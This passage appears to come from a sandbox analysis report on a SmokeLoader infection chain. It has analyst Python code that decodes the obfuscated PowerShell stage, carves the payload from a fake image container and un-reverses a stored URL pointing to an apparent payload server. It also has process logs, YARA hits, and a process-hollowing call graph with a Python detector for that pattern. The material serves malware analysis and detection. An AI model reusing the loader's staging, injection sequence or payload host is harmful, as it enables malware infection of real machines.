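def decode_stage1(blob: str, filler: str = STAGE1_FILLER) -> str:
    """Restore 'A', base64-decode, then decode UTF-16LE (EncodedCommand style)."""
    b64 = blob.replace(filler, "A")
    raw = base64.b64decode(b64, validate=True)
    return raw.decode("utf-16-le")


def encode_stage1(script: str, filler: str = STAGE1_FILLER) -> str:
    """Inverse of decode_stage1; only used to build offline test input."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return b64.replace("A", filler)


# --- Stage 2: the 'vbs.jpg' fetched by the second powershell.exe ---
# The file is read as text; the payload is the base64 between two markers.
# The original one-liner evaluates '$startIndex -ge 0 -and $endIndex -gt
# $startIndex' as a bare expression and never branches on it, so it does not
# really validate the container; this carver returns None instead.
START_FLAG = "<<BASE64_START>>"
END_FLAG = "<<BASE64_END>>"


def carve_stage2(container: bytes) -> Optional[bytes]:
    """Return the decoded payload, or None when the markers are missing or reversed."""
    text = container.decode("utf-8", errors="replace")
    start = text.find(START_FLAG)
    if start < 0:
        return None
    start += len(START_FLAG)
    end = text.find(END_FLAG, start)        # end marker must follow the start marker
    if end < 0:
        return None
    b64 = "".join(text[start:end].split())  # tolerate line breaks inside the blob
    return base64.b64decode(b64, validate=True)


def looks_like_pe(data: bytes) -> bool:
    """Assembly.Load() needs a managed PE; the cheapest sanity check is the MZ header."""
    return data[:2] == b"MZ"


def build_container(payload: bytes) -> bytes:
    """Constructed stand-in for vbs.jpg: JPEG-looking bytes around a marked blob."""
    return (b"\xff\xd8\xff\xe0 not really an image " + START_FLAG.encode()
            + base64.b64encode(payload) + END_FLAG.encode() + b" trailer")


# --- The reflective call: dnlib.IO.Home.VAI(<reversed string>, ...) ---
VAI_ARG_FROM_REPORT = "txt.VFEW/09/61.841.49.32//:ptth"


def unreverse(arg: str) -> str:
    """The first VAI argument is stored back-to-front; reverse it to read it."""
    return arg[::-1]


if __name__ == "__main__":
    print(repr(decode_stage1(REPORT_PREFIX)))
    fake_pe = b"MZ\x90\x00" + b"\x00" * 60          # constructed, not a real binary
    payload = carve_stage2(build_container(fake_pe))
    print(payload is not None and looks_like_pe(payload))
    print(carve_stage2(b"no markers here"))
    print(unreverse(VAI_ARG_FROM_REPORT))
```

decode_stage1(REPORT_PREFIX) yields the opening of the second command line ("$imageUrl = "), which is how the two entries above connect. The reversed VAI argument reads as a plain http:// URL; what is served there is not shown in this section of the report.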

                                                    Target ID:8
                                                    Start time:13:25:08
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                    Imagebase:0x130000
                                                    File size:64'704 bytes
                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:13:25:08
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                    Imagebase:0x130000
                                                    File size:64'704 bytes
                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:10
                                                    Start time:13:25:08
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                    Imagebase:0x130000
                                                    File size:64'704 bytes
                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.376080124.00000000000C1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000A.00000002.376080124.00000000000C1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.376068215.00000000000A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000A.00000002.376068215.00000000000A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:12
                                                    Start time:13:25:13
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Explorer.EXE
                                                    Imagebase:0xff2f0000
                                                    File size:3'229'696 bytes
                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:13
                                                    Start time:13:25:21
                                                    Start date:31/08/2024
                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                    Imagebase:0x400000
                                                    File size:543'304 bytes
                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:16
                                                    Start time:13:25:31
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\System32\taskeng.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:taskeng.exe {B5E7D6C9-0A45-4095-9C68-D1725C8390DE} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                    Imagebase:0xff6a0000
                                                    File size:464'384 bytes
                                                    MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:17
                                                    Start time:13:25:32
                                                    Start date:31/08/2024
                                                    Path:C:\Users\user\AppData\Roaming\gwseuha
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\gwseuha
                                                    Imagebase:0x13a0000
                                                    File size:64'704 bytes
                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 0%, ReversingLabs
                                                    • Detection: 0%, Virustotal, Browse
                                                    Has exited:true

                                                    Target ID:19
                                                    Start time:13:25:32
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                    Imagebase:0x9c0000
                                                    File size:2'972'672 bytes
                                                    MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:20
                                                    Start time:13:25:33
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\explorer.exe
                                                    Imagebase:0xff2f0000
                                                    File size:3'229'696 bytes
                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:21
                                                    Start time:13:25:34
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                    Imagebase:0x9c0000
                                                    File size:2'972'672 bytes
                                                    MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:22
                                                    Start time:13:25:36
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                    Imagebase:0x9c0000
                                                    File size:2'972'672 bytes
                                                    MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:23
                                                    Start time:13:25:37
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\explorer.exe
                                                    Imagebase:0xff2f0000
                                                    File size:3'229'696 bytes
                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:24
                                                    Start time:13:25:39
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                    Imagebase:0x9c0000
                                                    File size:2'972'672 bytes
                                                    MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    Has exited:false

                                                    Target ID:25
                                                    Start time:13:25:40
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\explorer.exe
                                                    Imagebase:0xff2f0000
                                                    File size:3'229'696 bytes
                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000019.00000002.628348956.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    Has exited:false

                                                    Target ID:26
                                                    Start time:13:25:41
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                    Imagebase:0x9c0000
                                                    File size:2'972'672 bytes
                                                    MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:27
                                                    Start time:13:25:42
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\explorer.exe
                                                    Imagebase:0xff2f0000
                                                    File size:3'229'696 bytes
                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.367223692.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_19d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: afcc702efb120f14cebbfb0a637f8a2a9331f3432e527806ab1702076291e174
                                                      • Instruction ID: 3fc9cc7846ee4ed0904c49d21d8d86c1277ba0f410744eb978c001339dd3bd7d
                                                      • Opcode Fuzzy Hash: afcc702efb120f14cebbfb0a637f8a2a9331f3432e527806ab1702076291e174
                                                      • Instruction Fuzzy Hash: A201A771504340AAEB104E19DC84B67BFD8EF41764F2CC51AFC494B286C779D845C6B1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.367223692.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_19d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2dfe5afc35c2925d5075eedba4baa2777c11c21e2b3997992bb7b27b55e44dfa
                                                      • Instruction ID: 9a6721b48d1fa34f0e04ebdcfe9b2327cf7d46ddbbc22a47dcf73b94fa234ca1
                                                      • Opcode Fuzzy Hash: 2dfe5afc35c2925d5075eedba4baa2777c11c21e2b3997992bb7b27b55e44dfa
                                                      • Instruction Fuzzy Hash: 25F06271404344AFEB108E1ADCC8BA6FFD8EB51774F18C55AED484E286C3799C45CAB1

                                                      Execution Graph

                                                      Execution Coverage:8.9%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:58.7%
                                                      Total number of Nodes:46
                                                      Total number of Limit Nodes:2
execution_graph (rendered as an interactive graph on the original page; the edge list is reduced here to its recoverable content): entry 554b40 -> 554b67 -> 554c90 -> 554ca0 -> 554d58 -> 554d8b. From there the function reaches, in order, 55172c -> 555930 CreateProcessW, 551738 / 555c68 Wow64SetThreadContext, 551774 -> 555f98 WriteProcessMemory (called repeatedly from 55537c and 55561b), 551780 / 555c68 Wow64SetThreadContext, and 551798 -> 5560d8 ResumeThread, then returns through 555821 to 554ca0. 46 nodes, 2 limit nodes.
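The sequence in this execution graph, CreateProcessW followed by WriteProcessMemory, Wow64SetThreadContext and ResumeThread in the same process, is the process-hollowing pattern: a child is spawned, its image is overwritten, the main thread's context is redirected to the written code, and the thread is resumed. Wow64SetThreadContext sets the 32-bit (WOW64) context of the target thread, so the hollowed child here is a 32-bit process. The Python below is an added example for this report and is not Joe Sandbox code or tooling; it matches that ordered chain per process over a constructed trace whose line format ("pid=N Api.Module(args), ref: addr"), pid values and the ResumeThread address are assumptions modelled on the API annotations in this report.

```python
import re
from collections import defaultdict

# Chain shown by the execution graph above for process 7 (powershell.exe):
# spawn a child, overwrite its memory, point its thread at the new code,
# resume it. Extra calls between the steps (the report shows a second
# Wow64SetThreadContext and repeated WriteProcessMemory) are tolerated.
HOLLOWING_CHAIN = ("CreateProcessW", "WriteProcessMemory",
                   "Wow64SetThreadContext", "ResumeThread")
# The same step against a native 64-bit target shows up under other names.
SET_CONTEXT_APIS = {"Wow64SetThreadContext", "SetThreadContext",
                    "NtSetContextThread"}
CREATE_SUSPENDED = 0x4  # dwCreationFlags bit, 6th CreateProcessW argument

# Constructed trace line format (an assumption of this example), modelled on
# the report's "Api.Module(args), ref: address" annotations plus a pid prefix.
LINE_RE = re.compile(
    r"^pid=(?P<pid>\d+)\s+(?P<api>\w+)\.(?P<module>\w+)"
    r"\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")


def parse_trace(text):
    """Return one dict per well-formed trace line; unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        ev["pid"] = int(ev["pid"])
        ev["args"] = [a.strip() for a in ev["args"].split(",")] if ev["args"] else []
        events.append(ev)
    return events


def created_suspended(args):
    """True only if dwCreationFlags is resolvable and has CREATE_SUSPENDED set.

    The report prints unresolved arguments as '?', so an unknown flag value
    yields False (unknown) rather than a guess.
    """
    if len(args) < 6 or args[5] == "?":
        return False
    try:
        return bool(int(args[5], 0) & CREATE_SUSPENDED)
    except ValueError:
        return False


def find_hollowing(events):
    """Return one hit per process whose calls contain HOLLOWING_CHAIN in order."""
    per_pid = defaultdict(list)
    for ev in events:
        per_pid[ev["pid"]].append(ev)
    hits = []
    for pid, evs in sorted(per_pid.items()):
        step, refs, suspended = 0, [], False
        for ev in evs:
            want = HOLLOWING_CHAIN[step]
            api = ev["api"]
            matched = api == want or (
                want == "Wow64SetThreadContext" and api in SET_CONTEXT_APIS)
            if not matched:
                continue
            if step == 0:
                suspended = created_suspended(ev["args"])
            refs.append(ev["ref"])
            step += 1
            if step == len(HOLLOWING_CHAIN):
                hits.append({"pid": pid, "refs": refs, "suspended": suspended})
                break
    return hits


# Constructed sample trace: call sites for the first four calls follow the
# ref addresses in this report; pids, the 0x4 flag and the ResumeThread
# address are invented for the example.
SAMPLE_TRACE = """\
pid=7 CreateProcessW.KERNEL32(?,?,?,?,?,0x4,?,?,?,?), ref: 00555B0F
pid=7 Wow64SetThreadContext.KERNEL32(?,?), ref: 00555D12
pid=7 WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00556066
pid=7 WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00556066
pid=7 Wow64SetThreadContext.KERNEL32(?,?), ref: 00555D12
pid=7 ResumeThread.KERNEL32(?), ref: 005560D8
pid=9 CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00401000
pid=9 ResumeThread.KERNEL32(?), ref: 00401100
"""

if __name__ == "__main__":
    for hit in find_hollowing(parse_trace(SAMPLE_TRACE)):
        print(f"pid {hit['pid']}: hollowing chain at {' -> '.join(hit['refs'])}"
              f" (CREATE_SUSPENDED seen: {hit['suspended']})")
```

The detector keys on call order within one process rather than on arguments because the report resolves most arguments as `?`; the CREATE_SUSPENDED check is only a confidence booster when the flag is visible. It will not fire on injection into an already running process (OpenProcess, VirtualAllocEx, CreateRemoteThread), which is a different chain and needs its own rule.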

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
control_flow_graph (rendered as a graph on the original page; the node list is reduced here to its recoverable content): function at 554d58, basic blocks spanning 554d58-55590d, with calls to 55172c (CreateProcessW), 551738 (Wow64SetThreadContext), 551744, 551750, 55175c, 551768 (twice), 551774 (WriteProcessMemory, three call sites), 551780 (Wow64SetThreadContext), 55178c and 551798 (ResumeThread).
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363624944.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_550000_powershell.jbxd
                                                      Similarity
                                                      • API ID: ContextMemoryProcessThreadWow64Write
                                                      • String ID:
                                                      • API String ID: 3696009080-0
                                                      • Opcode ID: 9124b77897fde315e41200fba80ca91cd611cc533adf4d45789870eb99ffc089
                                                      • Instruction ID: 0241623a229cf8e1792e1563d75b26ee1da30dc02e451ff2e2522ad9904adf08
                                                      • Opcode Fuzzy Hash: 9124b77897fde315e41200fba80ca91cd611cc533adf4d45789870eb99ffc089
                                                      • Instruction Fuzzy Hash: 7362D474D116298FDB68DF29C894BEDBBB2BB89301F5081EA940DA7251EB305EC5CF50
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363624944.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_550000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 88d967c410c325d508d6a63227842cd68232bd3c63df49ae6d0ce10cb422f02e
                                                      • Instruction ID: 27776dac310cc3ceeffa5761601353cf2db612c9ee4297bed2cceeb574542522
                                                      • Opcode Fuzzy Hash: 88d967c410c325d508d6a63227842cd68232bd3c63df49ae6d0ce10cb422f02e
                                                      • Instruction Fuzzy Hash: D432E374D016298FDB68DF25C864BEDBBB2BB89301F5081EAD50DA7291EB305E85CF50

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
control_flow_graph (rendered as a graph on the original page; the node list is reduced here to its recoverable content): function at 880b98, basic blocks spanning 880b98-8811cf, no API calls resolved.
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363671503.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_880000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'p$4'p$4'p$4'p$8#g$8#g$l;}$l;}$$p$$p$$p$$p$$p$$p$$p$$p$$p
                                                      • API String ID: 0-1411758938
                                                      • Opcode ID: dd80fbdf92ad5515d453a6f6fc0809eaeaf1a4e0d34f36a9cc09c89bfd3c821c
                                                      • Instruction ID: da411795cf733548d55c7e255f8d699fa4bafe47a597d2d6577706861fd9507e
                                                      • Opcode Fuzzy Hash: dd80fbdf92ad5515d453a6f6fc0809eaeaf1a4e0d34f36a9cc09c89bfd3c821c
                                                      • Instruction Fuzzy Hash: 1DF14735B002059FDBA4AE69C81477ABBA6FFC5310F28847AD945CB281DF71DC4ACB61

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
control_flow_graph (rendered as a graph on the original page; the node list is reduced here to its recoverable content): function at 88203c, basic blocks spanning 88203c-88244d, no API calls resolved.
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363671503.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_880000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (op$(op$L4p$L4p$L4p$d=}
                                                      • API String ID: 0-1571529565
                                                      • Opcode ID: ca3fa7546175150b7a8ae4519d0837070680aef3f31e45a5e0cac43026dc5037
                                                      • Instruction ID: 713077d1de9974b91b5d5633ceb82093d46da724fa306da15c23ef75e87d6e02
                                                      • Opcode Fuzzy Hash: ca3fa7546175150b7a8ae4519d0837070680aef3f31e45a5e0cac43026dc5037
                                                      • Instruction Fuzzy Hash: 8EB13835700248DFDB29AF68C854BAEBBA2FF85310F648466E941CB291CB75DC45CB51

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
control_flow_graph (rendered as a graph on the original page; the node list is reduced here to its recoverable content): function at 881730, basic blocks spanning 881730-8818df, no API calls resolved.
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363671503.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_880000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'p$4'p$$p$$p$$p
                                                      • API String ID: 0-2334450948
                                                      • Opcode ID: d79878c477119db2042772238adf14a2318a5ae188722fed2eecab71f011cbcd
                                                      • Instruction ID: c4da622cabd430b0f4a41d6e25289006d3a6acadd487c86582dd1658a97794ff
                                                      • Opcode Fuzzy Hash: d79878c477119db2042772238adf14a2318a5ae188722fed2eecab71f011cbcd
                                                      • Instruction Fuzzy Hash: F741FF35700205DBCF297A6884096AAFBEAFBC1310BA8857ED855CA259DF70CC42C752

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 325 881b7f-881b97 327 881b9e-881ba0 325->327 328 881bb8-881c0f 327->328 329 881ba2-881ba8 327->329 331 881baa 329->331 332 881bac-881bae 329->332 331->328 332->328
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363671503.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_880000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'p$4'p
                                                      • API String ID: 0-3973980265
                                                      • Opcode ID: f45afd339e754e5a86aa42e3140dbdfdca2ddba0b0b5c4722aefd3c39fd4bd41
                                                      • Instruction ID: 385f0109dca8dee5fcfa7e5fbee19699e95ac825e23372b5fdb5b72b2d0ecfd5
                                                      • Opcode Fuzzy Hash: f45afd339e754e5a86aa42e3140dbdfdca2ddba0b0b5c4722aefd3c39fd4bd41
                                                      • Instruction Fuzzy Hash: A2E0D831B043449ECF58766490253AC7B65FFD2325F6481EBC480C6245DE20CD17C392

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 333 55172c-5559bb 335 5559d2-5559e0 333->335 336 5559bd-5559cf 333->336 337 5559f7-555a33 335->337 338 5559e2-5559f4 335->338 336->335 339 555a35-555a44 337->339 340 555a47-555b22 CreateProcessW 337->340 338->337 339->340 344 555b24-555b2a 340->344 345 555b2b-555bf4 340->345 344->345 354 555bf6-555c1f 345->354 355 555c2a-555c35 345->355 354->355 358 555c36 355->358 358->358
                                                      APIs
                                                      • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00555B0F
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363624944.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_550000_powershell.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 9b669bbd720cd51dbd08652b36ad5bbdd383205b8bba77df5cc2c65e690aa1aa
                                                      • Instruction ID: de25b5b71091c416423e8c0e83df5b6f065d3c1c5fdd212eb8220a799c4eabb8
                                                      • Opcode Fuzzy Hash: 9b669bbd720cd51dbd08652b36ad5bbdd383205b8bba77df5cc2c65e690aa1aa
                                                      • Instruction Fuzzy Hash: 7C81C274D0026D9FDF25CFA9C954BDDBBB5BB09300F0090AAE549B7220D7749A89CF54

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 360 55592f-5559bb 361 5559d2-5559e0 360->361 362 5559bd-5559cf 360->362 363 5559f7-555a33 361->363 364 5559e2-5559f4 361->364 362->361 365 555a35-555a44 363->365 366 555a47-555b22 CreateProcessW 363->366 364->363 365->366 370 555b24-555b2a 366->370 371 555b2b-555bf4 366->371 370->371 380 555bf6-555c1f 371->380 381 555c2a-555c35 371->381 380->381 384 555c36 381->384 384->384
                                                      APIs
                                                      • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00555B0F
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363624944.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_550000_powershell.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 3ef65829f80a588191fa1ba54ac98696b03b628c709b3f2d8666bbc1a4a3173a
                                                      • Instruction ID: fba05e74e87a2e1c0dd2e7c3cfcc5ff11510ed99f611894c2fbd42955f235f48
                                                      • Opcode Fuzzy Hash: 3ef65829f80a588191fa1ba54ac98696b03b628c709b3f2d8666bbc1a4a3173a
                                                      • Instruction Fuzzy Hash: A781C074C0026D9FDF25CFA8C950BDDBBB1BB09300F0090AAE549B7220DB749A89CF54

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 386 555f91-555fff 388 556016-556076 WriteProcessMemory 386->388 389 556001-556013 386->389 390 55607f-5560bd 388->390 391 556078-55607e 388->391 389->388 391->390
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00556066
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363624944.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_550000_powershell.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 4d3aa8cc181a057a07f6b226da442d9f9e7964650c3097751d4979f7575d45bf
                                                      • Instruction ID: 798c088df425711381faaf5ec7f9c51179fcfb86a5c46f34b48719525a57ffd1
                                                      • Opcode Fuzzy Hash: 4d3aa8cc181a057a07f6b226da442d9f9e7964650c3097751d4979f7575d45bf
                                                      • Instruction Fuzzy Hash: 054188B9D002589FCF00CFA9D984ADEFBF1BB49310F24902AE818B7250D375AA45CF64

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 394 551774-555fff 396 556016-556076 WriteProcessMemory 394->396 397 556001-556013 394->397 398 55607f-5560bd 396->398 399 556078-55607e 396->399 397->396 399->398
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00556066
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363624944.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_550000_powershell.jbxd
